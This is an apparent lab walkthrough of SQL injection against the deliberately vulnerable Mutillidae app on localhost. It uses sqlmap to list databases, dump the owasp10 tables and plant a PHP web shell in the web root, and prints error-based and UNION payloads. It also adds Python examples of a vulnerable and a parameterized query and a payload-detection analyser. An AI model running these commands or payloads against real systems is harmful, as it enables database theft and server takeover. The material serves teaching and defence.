SQL injection is a code injection technique that exploits a security vulnerability in a website's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and is unexpectedly executed. SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump database information, like credit card numbers or passwords, to the attacker.
This is done by including portions of SQL statements in a web form entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker).
SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. (Wikipedia)
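The passage above names the defect (a quote in user input is treated as SQL rather than as data) but does not show it. The following is an added example, not code from the original post and not Mutillidae's own PHP: a Python stand-in for the user-info lookup using an in-memory sqlite3 table (assumed here in place of MySQL; the concatenation bug behaves the same way), with the vulnerable query beside its parameterized form. The table rows, the helper names and the probe inputs are all constructed for this example.

```python
import sqlite3

# Constructed stand-in for the Mutillidae accounts table (sqlite3 instead of
# MySQL so the example runs offline; the injection mechanics are the same).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT, signature TEXT)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("admin", "s3cret", "constructed row 1"),
         ("adrian", "letmein", "constructed row 2"),
         ("john", "hunter2", "constructed row 3")],
    )
    return conn

def lookup_vulnerable(conn, username, password):
    # The query text is assembled by concatenation, the "incorrectly filtered"
    # case above: a quote in the input closes the string literal and whatever
    # follows is parsed as SQL, not as data.
    sql = ("SELECT username, signature FROM accounts WHERE username='"
           + username + "' AND password='" + password + "'")
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, username, password):
    # Placeholders: the SQL text is fixed and the values travel separately, so
    # a quote (or a whole UNION clause) in the input stays an ordinary string.
    sql = "SELECT username, signature FROM accounts WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()

def probe(conn, lookup, username, password=""):
    """Summarise what one input does against a lookup function: 'rows:N' for a
    normal result, 'error' when the database rejects the query. An application
    that shows that error to the client is what error-based injection keys on."""
    try:
        return "rows:%d" % len(lookup(conn, username, password))
    except sqlite3.DatabaseError:
        return "error"

if __name__ == "__main__":
    db = build_db()
    for name, fn in (("vulnerable", lookup_vulnerable), ("parameterized", lookup_parameterized)):
        print(name, "legit login ->", probe(db, fn, "admin", "s3cret"))
        print(name, "lone quote  ->", probe(db, fn, "'"))
        print(name, "tautology   ->", probe(db, fn, "' OR 1=1 --"))
```

Against the concatenated query a lone quote produces a database error (the signal error-based techniques rely on) and the tautology returns every account; against the parameterized query the same inputs are simply usernames that match nothing, and the legitimate login still works.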
I will use Mutillidae (http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10) to try MySQL injection, and I use Security Level 5 (Secure).
Then I set up Firefox to connect through the Burp Suite proxy, so I can see the data being sent.
After the proxy is set up, I just click the "View Account Details" button and Burp Suite captures the submitted data.
Then I test for SQL injection using sqlmap:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://127.0.0.1/mutillidae/index.php?page=user-info.php" --data="page=user-info.php&username=&password=&user-info-php-submit-button=View+Account+Details" --dbs

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:59:29

[23:59:29] [INFO] resuming back-end DBMS 'mysql'
[23:59:29] [INFO] testing connection to the target url
[23:59:34] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=' AND (SELECT 3845 FROM(SELECT COUNT(*),CONCAT(0x3a6e74653a,(SELECT (CASE WHEN (3845=3845) THEN 1 ELSE 0 END)),0x3a7479613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vRDK'='vRDK&password=&user-info-php-submit-button=View Account Details

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: username=' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6e74653a,0x6a71624950584e6e735a,0x3a7479613a), NULL, NULL, NULL#&password=&user-info-php-submit-button=View Account Details
---
[23:59:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[23:59:34] [INFO] fetching database names
available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10
[*] sips

[23:59:34] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/127.0.0.1'

[*] shutting down at 23:59:34

root@bt:/pentest/database/sqlmap#
It seems the injection is working, so next I dump the database:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://127.0.0.1/mutillidae/index.php?page=user-info.php" --data="page=user-info.php&username=&password=&user-info-php-submit-button=View+Account+Details" -D owasp10 --dump-all
Then I need to create a backdoor:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://127.0.0.1/mutillidae/index.php?page=user-info.php" --data="page=user-info.php&username=&password=&user-info-php-submit-button=View+Account+Details" --file-write="/pentest/backdoors/web/webshells/php/simple-backdoor.php" --file-dest="/var/www/mutillidae/back.php"

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 00:28:50

[00:28:50] [INFO] resuming back-end DBMS 'mysql'
[00:28:50] [INFO] testing connection to the target url
[00:28:51] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=' AND (SELECT 3845 FROM(SELECT COUNT(*),CONCAT(0x3a6e74653a,(SELECT (CASE WHEN (3845=3845) THEN 1 ELSE 0 END)),0x3a7479613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vRDK'='vRDK&password=&user-info-php-submit-button=View Account Details

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: username=' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6e74653a,0x6a71624950584e6e735a,0x3a7479613a), NULL, NULL, NULL#&password=&user-info-php-submit-button=View Account Details
---
[00:28:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[00:28:51] [INFO] fingerprinting the back-end DBMS operating system
[00:28:51] [INFO] the back-end DBMS operating system is Linux
do you want confirmation that the file '/var/www/mutillidae/back.php' has been successfully written on the back-end DBMS file system? [Y/n] y
[00:28:53] [INFO] the file has been successfully written and its size is 332 bytes, but the size differs from the local file '/pentest/backdoors/web/webshells/php/simple-backdoor.php' (328 bytes)
[00:28:53] [WARNING] expect junk characters inside the file as a leftover from UNION query
[00:28:53] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/127.0.0.1'

[*] shutting down at 00:28:53

root@bt:/pentest/database/sqlmap#
Game Over..!!
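sqlmap reported two injection points in the username parameter, an error-based one and a UNION one, and the final run used the same injection to write a file into the web root. As an added example (not part of the original post, and not Mutillidae or sqlmap code), here is a small Python analyser a defender could run over captured POST bodies, as Burp Suite or a web server log would show them, to flag those payload shapes. The signature names, the scoring rule and the sample bodies are constructed for this example; the two sqlmap payloads are the ones printed in the output above, and the INTO OUTFILE / DUMPFILE signature covers the MySQL file-write primitive that a file drop like the backdoor step depends on.

```python
import re
from urllib.parse import parse_qs, urlencode

# Signatures run against the URL-decoded parameter value, so percent-encoding
# in the raw body hides nothing. Names are constructed for this example.
SIGNATURES = {
    "union_select": re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.I),
    "information_schema": re.compile(r"\bINFORMATION_SCHEMA\.", re.I),
    # duplicate-key trick that the MySQL error-based payload above is built on
    "error_based_rand_floor": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    # hex delimiters such as 0x3a6e74653a that wrap the extracted data
    "hex_marker_concat": re.compile(r"CONCAT\s*\(\s*0x[0-9a-f]+", re.I),
    "comment_terminator": re.compile(r"(?:#|--\s|/\*)\s*$"),
    # MySQL file-write primitive; a file drop like the backdoor step needs it
    "into_outfile": re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b", re.I),
}

def analyze_value(value):
    """Signature names tripped by one decoded parameter value."""
    hits = {name for name, rx in SIGNATURES.items() if rx.search(value)}
    if value.count("'") % 2 == 1:
        hits.add("unbalanced_quote")  # an odd quote count is what closes the app's literal
    return hits

def analyze_body(body):
    """Map each parameter of a form-encoded POST body to the sorted hits it tripped."""
    findings = {}
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for v in values:
            hits = analyze_value(v)
            if hits:
                findings.setdefault(param, set()).update(hits)
    return {p: sorted(h) for p, h in findings.items()}

def verdict(findings):
    """A lone unbalanced quote is normal user data (O'Brien); anything more is flagged."""
    for hits in findings.values():
        if hits != ["unbalanced_quote"]:
            return "suspicious"
    return "benign"

# Constructed sample bodies for the Mutillidae user-info form: two benign
# submissions and the two payloads sqlmap printed above.
ERROR_BASED = ("' AND (SELECT 3845 FROM(SELECT COUNT(*),CONCAT(0x3a6e74653a,(SELECT (CASE WHEN "
               "(3845=3845) THEN 1 ELSE 0 END)),0x3a7479613a,FLOOR(RAND(0)*2))x FROM "
               "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vRDK'='vRDK")
UNION_BASED = ("' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6e74653a,0x6a71624950584e6e735a,"
               "0x3a7479613a), NULL, NULL, NULL#")

def form_body(username, password=""):
    return urlencode({"page": "user-info.php", "username": username, "password": password,
                      "user-info-php-submit-button": "View Account Details"})

SAMPLE_BODIES = {
    "normal_login": form_body("adrian", "somepassword"),
    "apostrophe_name": form_body("O'Brien", "pw"),
    "sqlmap_error_based": form_body(ERROR_BASED),
    "sqlmap_union": form_body(UNION_BASED),
}

if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        findings = analyze_body(body)
        print("%-20s %-10s %s" % (label, verdict(findings), findings))
```

Detection of this kind only tells you the probes are arriving; the fix is the parameterized query. Note also that the file write in the last run is not a consequence of the injection alone: it needs the application's database account to hold the MySQL FILE privilege and a web root writable by the MySQL server process, so a least-privileged database account and a restrictive secure_file_priv setting stop that step even where the injection itself is present.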
Are you sure?? Mutillidae uses sessions to activate the security level. So your sqlmap is using level 0 to exploit and extract the vulnerability. If you use the payload shown by sqlmap, you can't exploit the vulnerability.